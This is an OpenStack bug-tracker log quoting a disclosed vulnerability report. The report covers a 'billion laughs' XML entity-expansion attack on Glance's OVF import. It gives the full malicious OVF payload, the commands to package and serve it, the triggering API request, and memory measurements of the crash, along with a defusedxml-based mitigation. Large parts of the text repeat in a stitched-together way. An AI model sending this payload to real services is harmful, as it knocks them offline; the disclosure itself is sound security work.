devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
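Until defusedxml is adopted, the core of its defense can be sketched with the stdlib alone: install an expat EntityDeclHandler that aborts as soon as the DTD declares any entity, before anything can be expanded. This is an illustration of the technique (safe_fromstring and EntitiesForbidden are made-up names), not the actual Glance patch:

```python
# Sketch: reject entity declarations before expansion, which is the
# essence of what defusedxml does. Illustrative only.
import xml.parsers.expat
import xml.etree.ElementTree as ET

class EntitiesForbidden(ValueError):
    """Raised when untrusted XML declares an entity in its DTD."""

def reject_entities(data):
    """Pre-scan with expat; abort on any <!ENTITY ...> declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def _forbid(entity_name, *args):
        raise EntitiesForbidden("entity declaration %r forbidden" % entity_name)

    # The handler fires at declaration time, before any reference is expanded.
    parser.EntityDeclHandler = _forbid
    parser.Parse(data, True)

def safe_fromstring(data):
    reject_entities(data)        # raises on the bomb
    return ET.fromstring(data)   # plain ElementTree parse is now safe

bomb = (b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE lolz [ <!ENTITY lol "lol"> ]>\n'
        b'<lolz>&lol;</lolz>')

try:
    safe_fromstring(bomb)
except EntitiesForbidden as exc:
    print("rejected:", exc)

print(safe_fromstring(b"<Envelope><DiskSection/></Envelope>").tag)  # Envelope
```

In production the pre-scan wrapper is unnecessary: defusedxml.ElementTree exposes drop-in replacements that raise comparable exceptions by default.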
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool, Syntribos (https://github.com/openstack/syntribos), as well as Bandit (which was used to discover this issue). |
|
2016-09-20 01:04:23 |
Tristan Cacqueray |
bug |
|
|
added subscriber Glance Core security contacts |
2016-09-20 15:28:56 |
Nikhil Komawar |
glance: status |
New |
Opinion |
|
2016-09-20 15:29:00 |
Nikhil Komawar |
glance: importance |
Undecided |
Low |
|
2016-09-27 14:11:06 |
Tristan Cacqueray |
ossa: status |
New |
Incomplete |
|
2016-09-27 14:15:05 |
Tristan Cacqueray |
bug |
|
|
added subscriber OSSG CoreSec |
2016-09-27 14:15:10 |
Tristan Cacqueray |
ossa: status |
Incomplete |
Opinion |
|
2016-09-27 18:49:37 |
Jeremy Stanley |
information type |
Private Security |
Public |
|
2016-09-28 20:59:54 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
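For a sense of scale (my own back-of-the-envelope arithmetic, not from the Python docs): the ten-level payload used here multiplies the entity count by ten at each level, starting from the 3-byte string "lol", so fully expanding &lol10; yields:

```python
# Size of the fully expanded document produced by the ten-level bomb:
# each level references the previous entity ten times.
levels = 10
fanout = 10
expanded_bytes = len("lol") * fanout ** levels
print(expanded_bytes)  # 30000000000 -- roughly 30 GB from a sub-kilobyte file
```

That asymmetry is why a single small OVF can exhaust the memory of the glance-api process.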
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool, Syntribos (https://github.com/openstack/syntribos), as well as Bandit (which was used to discover this issue). |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool, Syntribos (https://github.com/openstack/syntribos), as well as Bandit (which was used to discover this issue). |
|
2018-01-31 22:18:11 |
Brian Rosmaita |
glance: milestone |
|
queens-rc1 |
|
2018-01-31 22:18:29 |
Brian Rosmaita |
glance: status |
Opinion |
In Progress |
|
2018-01-31 22:19:01 |
Brian Rosmaita |
glance: assignee |
|
Vladislav Kuzmin (vkuzmin-u) |
|
2018-02-08 03:23:13 |
Brian Rosmaita |
glance: status |
In Progress |
Fix Released |
|
2018-02-08 03:23:13 |
Brian Rosmaita |
glance: assignee |
Vladislav Kuzmin (vkuzmin-u) |
|
|